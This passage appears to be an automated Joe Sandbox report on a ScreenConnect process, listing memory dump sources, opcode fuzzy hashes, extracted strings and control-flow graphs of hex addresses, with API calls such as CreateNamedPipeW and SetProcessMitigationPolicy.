                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ecfb2b86e22055ceeed88bd6ef635d63e3821399ff1c195dce70c0854dcbd7cd
                                                                                                                                                                                • Instruction ID: 1d7162be9b39b6bc999bd3551586e9a9ff071ea023ceac7daf9250e88f57a30a
                                                                                                                                                                                • Opcode Fuzzy Hash: ecfb2b86e22055ceeed88bd6ef635d63e3821399ff1c195dce70c0854dcbd7cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 85D05E343502154FC788E738E44486E73DAAF8852435140A4D40DCB364EEB0EC4247D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 68d5eb3aff66b6f03742828c0f20cb0daf867c753a44fceedc4e1ba29971f4ac
                                                                                                                                                                                • Instruction ID: 32b7bfc78893912065bd131c75b3d23583a6fb31fd73ec98e97e728fac6a2911
                                                                                                                                                                                • Opcode Fuzzy Hash: 68d5eb3aff66b6f03742828c0f20cb0daf867c753a44fceedc4e1ba29971f4ac
                                                                                                                                                                                • Instruction Fuzzy Hash: 23D0C7341075409FC719CBB5DC97D547FB5FF4A60230941DAE106CB773DA25A865CB01
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1f18cb07840fdc0b759e62a4185b00b83cacfd3323946cf1e71010a85cd87258
                                                                                                                                                                                • Instruction ID: 453850cd45687ee14889c59debffd85af3f47ac2566bee654676e0d007a0b9d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f18cb07840fdc0b759e62a4185b00b83cacfd3323946cf1e71010a85cd87258
                                                                                                                                                                                • Instruction Fuzzy Hash: F2E012342445409FC705CB78D996C243BB5AF8A60471585D5D50D8F3B3D631AC65DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: af159acaf021f5650fb50b8922e3a933ba12a357620a8c47aed9eac6a1937daf
                                                                                                                                                                                • Instruction ID: 257e0dc77b20346e1b2d0bd57d2a62ca404351e0faa84f2a01902757ab2b7f08
                                                                                                                                                                                • Opcode Fuzzy Hash: af159acaf021f5650fb50b8922e3a933ba12a357620a8c47aed9eac6a1937daf
                                                                                                                                                                                • Instruction Fuzzy Hash: B0D0127090514CEF8B04DFB4E94195EBBF9DB49200B1045AAD908D7204EB316F049B40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f4580ad2fac52f055049cdd2e840185a8a3b469f772dcc944fbf589e792dc401
                                                                                                                                                                                • Instruction ID: 94c637cfa30fa2f9b77c2d787459792985286cd571ee5297f6a2351d436ec408
                                                                                                                                                                                • Opcode Fuzzy Hash: f4580ad2fac52f055049cdd2e840185a8a3b469f772dcc944fbf589e792dc401
                                                                                                                                                                                • Instruction Fuzzy Hash: 48E0173190A3809FCF07CB6CECA6A683BB0BE4624034A01C2C040CB2A6D3216815CBB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e2be92cb1ecae40e7169323d4816aec9b30dfe568e6e5d57e6afa2706ff5988c
                                                                                                                                                                                • Instruction ID: aa8023faff7c1084cfd20b7b9aae7a06eb5cb4d238ded3ea429ecc5aa374b20d
                                                                                                                                                                                • Opcode Fuzzy Hash: e2be92cb1ecae40e7169323d4816aec9b30dfe568e6e5d57e6afa2706ff5988c
                                                                                                                                                                                • Instruction Fuzzy Hash: 50D01730A0120CEF8B04EFA8EA4195DBBF9EF44200B1045AAD908D7254EA316F049B80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbc8aaef112cacb5aca6ac08b0ed6227a2bc0cdd697003ed738ec224f1968460
                                                                                                                                                                                • Instruction ID: 5c6bb7f3e51d3cdba98b96865d1513cf3c62838953cefec54ee94fc949757b97
                                                                                                                                                                                • Opcode Fuzzy Hash: bbc8aaef112cacb5aca6ac08b0ed6227a2bc0cdd697003ed738ec224f1968460
                                                                                                                                                                                • Instruction Fuzzy Hash: 42D05E30A5020CEFCB04EFB8EA4296DBBF9EF44211B1045E9D408D7205EB316F149B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7ffc6459f3af44f8ed4158b6aa379dd9f6c35efb0836bd0d7daac88d068e92bd
                                                                                                                                                                                • Instruction ID: 7de5dd2396a3109e5104498765b6b2956fa164248ce56c415dae1c913aa464d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ffc6459f3af44f8ed4158b6aa379dd9f6c35efb0836bd0d7daac88d068e92bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 46E0863140474ACFC701EF68C599459BBB0EF95304B058B8BD0455B121EB30A495D741
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c4020df632955dd524e24743afccd48166b77411e70ef0d50ca1b93c5078a4b2
                                                                                                                                                                                • Instruction ID: fdfdf0d7ce387b1a811d2e5da735be8dbbc848a963ad7c47ba17ce2c39b622a6
                                                                                                                                                                                • Opcode Fuzzy Hash: c4020df632955dd524e24743afccd48166b77411e70ef0d50ca1b93c5078a4b2
                                                                                                                                                                                • Instruction Fuzzy Hash: FDC08C2718430802FE1062FA25803BA368C0780B59F0840A2F40CC058AE959E4C02011
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9707feba204b13aa0aad579514e64de91d9115ace5dc90aa75dd6554d7c64baa
                                                                                                                                                                                • Instruction ID: 924dcbef73a9e9f8bb9a97501558777949f6bf731895572204e4f1743eb55e42
                                                                                                                                                                                • Opcode Fuzzy Hash: 9707feba204b13aa0aad579514e64de91d9115ace5dc90aa75dd6554d7c64baa
                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0C73141470D89C700BB78D454569B7B8EED5240F01C75AE54957121FF70E5D0D681
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 009299adc58f529b9e8c8f60b44b784db8c81911952206eaffa94d17eab3732d
                                                                                                                                                                                • Instruction ID: deeb2346832e0503b1d5124f5f7ff7b34a49d7697aedd1d25ea6fd629737b22b
                                                                                                                                                                                • Opcode Fuzzy Hash: 009299adc58f529b9e8c8f60b44b784db8c81911952206eaffa94d17eab3732d
                                                                                                                                                                                • Instruction Fuzzy Hash: E4C012342506048FC308DB68E698C1873FAAF8CA0832080A8E60E8B3B2CA71FC108A50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0f4eea905cfa18213550c64808de1e0434c9e505d8078df4bd6dd221ee19863d
                                                                                                                                                                                • Instruction ID: fb0ead14f5cc045a889cbfa635b494e740fde6f1a64dd73a1ca74b753880b8ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f4eea905cfa18213550c64808de1e0434c9e505d8078df4bd6dd221ee19863d
                                                                                                                                                                                • Instruction Fuzzy Hash: CDB092302506088FC708DA5DD444C54B7E9BF88A0430500E4E2098B332EA22FC008A40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a337524b36c5c1460889ac6263523214e01ec911c8cae03f33b01214e5cd80db
                                                                                                                                                                                • Instruction ID: 2b90228dbef3d7140978447d746349e4121a3e4585fc27497dd0b761b996b34d
                                                                                                                                                                                • Opcode Fuzzy Hash: a337524b36c5c1460889ac6263523214e01ec911c8cae03f33b01214e5cd80db
                                                                                                                                                                                • Instruction Fuzzy Hash: 7BB092749683264AC705990045B57D5B316FF81114F8942AE9C9486500C73D20A676A0

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:12.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:37.5%
                                                                                                                                                                                Total number of Nodes:8
                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                execution_graph 14059 7ff848f23642 14060 7ff848f45870 CreateNamedPipeW 14059->14060 14062 7ff848f459a3 14060->14062 14054 7ff848f28014 14055 7ff848f2801d 14054->14055 14056 7ff848f28082 14055->14056 14057 7ff848f280f6 SetProcessMitigationPolicy 14055->14057 14058 7ff848f28152 14057->14058
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c"I$h4"I$h4"I$h4"I$pW#I
                                                                                                                                                                                • API String ID: 0-789826408
                                                                                                                                                                                • Opcode ID: b3b228be2d6d0868150ff182f25e2355175172ae6e540827ae137fc62a3ab91e
                                                                                                                                                                                • Instruction ID: baf7f7809706c8d32b7495eb3839a23338be82081a48b45e0b7cb48b92e31baf
                                                                                                                                                                                • Opcode Fuzzy Hash: b3b228be2d6d0868150ff182f25e2355175172ae6e540827ae137fc62a3ab91e
                                                                                                                                                                                • Instruction Fuzzy Hash: 63C2F131A1DAAA4FF7B8BF3894566B977E1FF98380F54007AC05DC72D6DE28A9058341
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I
                                                                                                                                                                                • API String ID: 0-1409741480
                                                                                                                                                                                • Opcode ID: ba74dee2a17611cf4ccda6f130854052e2c06b3ed502b8762b045413dd23ae1c
                                                                                                                                                                                • Instruction ID: 597310a137e78d12d1b355b40d7b83a4d1eaa883aa7d3ba6286ec26acdf9b070
                                                                                                                                                                                • Opcode Fuzzy Hash: ba74dee2a17611cf4ccda6f130854052e2c06b3ed502b8762b045413dd23ae1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 12120631E1DAAB4FF7B9BF3854566B923D2EF54780F54047AC42DC72C6DE29A9068380

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1131 7ff848f23642-7ff848f458da 1134 7ff848f458dc-7ff848f458e1 1131->1134 1135 7ff848f458e4-7ff848f459a1 CreateNamedPipeW 1131->1135 1134->1135 1137 7ff848f459a9-7ff848f459dc 1135->1137 1138 7ff848f459a3 1135->1138 1138->1137
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3901983103.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff848f20000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateNamedPipe
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2489174969-0
                                                                                                                                                                                • Opcode ID: dc4620f1f35475333680a5383e66c42026684b73122533a0933f94b001c05714
                                                                                                                                                                                • Instruction ID: 349dd74a3e54c379504de63df2c2905a319c43772f3209315ef109141980ccc9
                                                                                                                                                                                • Opcode Fuzzy Hash: dc4620f1f35475333680a5383e66c42026684b73122533a0933f94b001c05714
                                                                                                                                                                                • Instruction Fuzzy Hash: 3251917191CA1C8FDB58EF5C9845BE9B7E0FB59710F1442AEE04DD3251CB34A8858BC6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7858fef42a85f4c7da74632e2ca2a4a98ea82ed19b0fd7aac7a1689815cf5ec8
                                                                                                                                                                                • Instruction ID: c1229c4fe9d907eb9b5258afd8b4e3b4810b44813fb0c13195def2a6156b2fe8
                                                                                                                                                                                • Opcode Fuzzy Hash: 7858fef42a85f4c7da74632e2ca2a4a98ea82ed19b0fd7aac7a1689815cf5ec8
                                                                                                                                                                                • Instruction Fuzzy Hash: B2E1E331E1CAAB4EF7B5BB3484166B977D6EF98390F54047AC01DC72C2DE29B9068384

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c"I$@e"I$PH$XH$`H
                                                                                                                                                                                • API String ID: 0-2353344705
                                                                                                                                                                                • Opcode ID: 57fb267c236ccb715d923af272aebc71cabe3552f35ae2cbdec8453ab7f2a994
                                                                                                                                                                                • Instruction ID: 7b02370a9696d4e37f9deb740a162018fe7a41ee18b499d37e5ecab455e2c3e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 57fb267c236ccb715d923af272aebc71cabe3552f35ae2cbdec8453ab7f2a994
                                                                                                                                                                                • Instruction Fuzzy Hash: 7561D872A0D9C98FEBA8EF389455AA537D1FF64750F0405BDC45EC7186DD29EC068780

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 446 7ff849230395-7ff8492303c8 450 7ff8492303ca-7ff84923041e 446->450 451 7ff849230420-7ff84923048e 446->451 450->451 463 7ff8492304d8-7ff849230500 451->463 464 7ff849230490-7ff8492304c6 451->464 468 7ff849230502-7ff849230521 463->468 469 7ff849230524-7ff84923053c 463->469 473 7ff84923053e-7ff84923055d 469->473 474 7ff849230560-7ff84923057e 469->474 473->474 479 7ff84923059a 474->479 480 7ff849230580-7ff849230590 474->480 482 7ff84923059f-7ff8492305a5 479->482 483 7ff849230597-7ff849230598 480->483 484 7ff8492305ab-7ff8492305b4 482->484 485 7ff84923063e-7ff849230641 482->485 483->479 486 7ff8492305cd-7ff8492305d8 484->486 487 7ff8492305b6-7ff8492305c3 484->487 488 7ff849230698-7ff8492306b6 485->488 489 7ff849230643-7ff84923064d 485->489 491 7ff8492305da-7ff8492305f7 486->491 492 7ff849230624-7ff849230630 486->492 487->486 495 7ff8492305c5-7ff8492305cb 487->495 505 7ff8492306ba-7ff8492306c6 488->505 506 7ff849230800-7ff84923081e 488->506 496 7ff849230655-7ff84923066e 489->496 498 7ff8492305fd-7ff849230622 491->498 499 7ff8492308e2-7ff84923093f 491->499 492->485 495->486 507 7ff8492306df-7ff8492306ea 496->507 508 7ff849230670-7ff849230672 496->508 498->492 535 7ff84923094b-7ff849230952 499->535 536 7ff849230941-7ff84923094a 499->536 512 7ff8492306c8-7ff8492306ca 505->512 513 7ff8492306cc-7ff8492306da call 7ff849230078 505->513 538 7ff8492308bd-7ff8492308df 506->538 539 7ff849230824-7ff84923082e 506->539 509 7ff8492306eb-7ff8492306ec 507->509 514 7ff8492306ee-7ff8492306fa 508->514 515 7ff849230674 508->515 509->514 521 7ff8492306dd-7ff8492306de 512->521 513->521 518 7ff8492306fc-7ff8492306fe 514->518 519 7ff849230700-7ff849230701 514->519 515->505 516 7ff849230676-7ff84923067a 515->516 516->509 523 7ff84923067c-7ff849230681 516->523 525 7ff849230711-7ff849230715 518->525 526 7ff849230702-7ff84923070e call 7ff849230078 519->526 521->507 523->526 528 7ff849230683-7ff84923068e 523->528 531 7ff849230716-7ff84923072e 525->531 526->525 533 7ff8492306ff 528->533 534 7ff849230690-7ff849230695 528->534 550 7ff849230730-7ff849230732 531->550 551 7ff849230734-7ff849230742 call 7ff849230078 531->551 533->519 534->531 540 7ff849230697 534->540 543 7ff84923095e-7ff849230969 535->543 544 7ff849230954-7ff84923095d 535->544 538->499 545 7ff849230830-7ff849230832 539->545 546 7ff849230834-7ff849230842 call 7ff849230078 539->546 540->488 547 7ff849230845-7ff849230862 545->547 546->547 558 7ff849230868-7ff849230876 call 7ff849230078 547->558 559 7ff849230864-7ff849230866 547->559 554 7ff849230745-7ff849230762 550->554 551->554 560 7ff849230768-7ff849230776 call 7ff849230078 554->560 561 7ff849230764-7ff849230766 554->561 562 7ff849230879-7ff849230896 558->562 559->562 564 7ff849230779-7ff84923078f 560->564 561->564 570 7ff849230898-7ff84923089a 562->570 571 7ff84923089c-7ff8492308aa call 7ff849230078 562->571 572 7ff849230791-7ff8492307a4 call 7ff849230078 564->572 573 7ff8492307a6-7ff8492307ad 564->573 574 7ff8492308ad-7ff8492308b6 570->574 571->574 572->573 580 7ff8492307cd-7ff8492307d0 572->580 578 7ff8492307b4-7ff8492307c7 573->578 574->538 578->580 581 7ff8492307d2-7ff8492307e5 call 7ff849230078 580->581 582 7ff8492307e7-7ff8492307fa 580->582 581->506 581->582 582->506
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I$0"I$2"I
                                                                                                                                                                                • API String ID: 0-3795713424
                                                                                                                                                                                • Opcode ID: 83d938e31918bb5f7d0a6a8059c46c6dd43ac66965246757cc392b1384d28f5b
                                                                                                                                                                                • Instruction ID: a6ce7439ac9f6d550b328adb5365133957fd57f1ce1b4beb17c5c090f2f751cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 83d938e31918bb5f7d0a6a8059c46c6dd43ac66965246757cc392b1384d28f5b
                                                                                                                                                                                • Instruction Fuzzy Hash: D0122571A5DAAA4FF7B8FA3C94556B537D1FF69380F0400BAD05DC7283DD29A8068360

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 610 7ff849234cf5-7ff849234d01 611 7ff849234d03 610->611 612 7ff849234d05-7ff849234d21 610->612 611->612 613 7ff849234d45-7ff849234d4b 611->613 619 7ff849234d28-7ff849234d2a 612->619 615 7ff849234d4d-7ff849234d62 613->615 616 7ff849234d64-7ff849234d79 613->616 615->616 620 7ff849234d7b-7ff849234db6 616->620 621 7ff849234dc3-7ff849234e02 616->621 622 7ff849234db9-7ff849234dc2 619->622 623 7ff849234d30-7ff849234d43 619->623 620->622 630 7ff849234e4c-7ff849234e4f 621->630 631 7ff849234e04-7ff849234e1b 621->631 623->613 634 7ff849234ecb 630->634 635 7ff849234e51 630->635 637 7ff849235038-7ff84923504a 631->637 638 7ff849234e21-7ff849234e27 631->638 641 7ff849234ecc-7ff849234ed6 634->641 639 7ff849234e53-7ff849234e5b 635->639 640 7ff849234e97-7ff849234ea4 635->640 638->637 642 7ff849234e2d-7ff849234e33 638->642 639->641 644 7ff849234e5d-7ff849234e5f 639->644 643 7ff849234ea7-7ff849234eb9 640->643 655 7ff849234ed8 641->655 642->637 645 7ff849234e39-7ff849234e3f 642->645 652 7ff849234ebb 643->652 653 7ff849234e91-7ff849234e92 643->653 647 7ff849234edb-7ff849234ee4 644->647 648 7ff849234e61 644->648 645->637 651 7ff849234e45-7ff849234e4b 645->651 650 7ff849234ee6-7ff849234eed 647->650 648->643 654 7ff849234e63-7ff849234e67 648->654 656 7ff849234eef-7ff849234ef8 650->656 651->630 658 7ff849234ebc-7ff849234eca 651->658 652->658 653->637 657 7ff849234e94 653->657 654->655 659 7ff849234e69-7ff849234e6e 654->659 655->647 661 7ff849234efd-7ff849234f18 656->661 657->640 658->634 659->656 660 7ff849234e70-7ff849234e75 659->660 660->650 662 7ff849234e77-7ff849234e7c 660->662 661->637 667 7ff849234f1e-7ff849234f24 661->667 662->661 663 7ff849234e7e-7ff849234e90 662->663 663->653 667->637 668 7ff849234f2a-7ff849234f30 667->668 668->637 669 7ff849234f36-7ff849234f3c 668->669 669->637 670 7ff849234f42-7ff849234fc2 669->670 670->637 679 7ff849234fc4-7ff849234fd9 call 7ff849233d10 670->679 682 7ff849234fde-7ff849234fe0 679->682 682->637 683 7ff849234fe2-7ff849234ffe call 7ff849233d10 682->683 683->637 687 7ff849235000-7ff849235008 683->687 687->637 688 7ff84923500a-7ff849235037 call 7ff849233d10 687->688
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0"I$2"I
                                                                                                                                                                                • API String ID: 0-3370933124
                                                                                                                                                                                • Opcode ID: 9c6a3dcb0e5c1622971a336efab0cf3374fc2f1779ebeda08db2fc7a22488e2d
                                                                                                                                                                                • Instruction ID: 4e194757fef68410a944ef41768e674e6f9645d9016f69ba7684a1b3360a6791
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6a3dcb0e5c1622971a336efab0cf3374fc2f1779ebeda08db2fc7a22488e2d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2FC1373290DD9B5FFBB9FE3894418B537E0EF55790B4401BAC45E87586EE29F90A8380

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3901983103.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff848f20000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: cf7084ebb5400a1690591197feb286a57d023385f84e6c0041e4ec65c6dce8bb
                                                                                                                                                                                • Instruction ID: de95a8c127836d39a385ecd735ee2ee07607308d559a99d7d234a538a30b7664
                                                                                                                                                                                • Opcode Fuzzy Hash: cf7084ebb5400a1690591197feb286a57d023385f84e6c0041e4ec65c6dce8bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 98512531C1CB598FEB18EFA8984A5E97BF0EF55360F04017EE049C3192DF68A846CB95
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: h4"I
                                                                                                                                                                                • API String ID: 0-1409741480
                                                                                                                                                                                • Opcode ID: 8afca70faedaec9600297e78286e6040aaefccd8c5e591e2949ae5cf0866781a
                                                                                                                                                                                • Instruction ID: 16aed2e8ef5a85a1df8511c2a3e9de5829570a15a733b2672d5bae7c1b620c8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8afca70faedaec9600297e78286e6040aaefccd8c5e591e2949ae5cf0866781a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B811431E1DAA74EFBB9BE3854566B567D0FF54B80F4400BAC86DC72C7DE2CA9058281

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
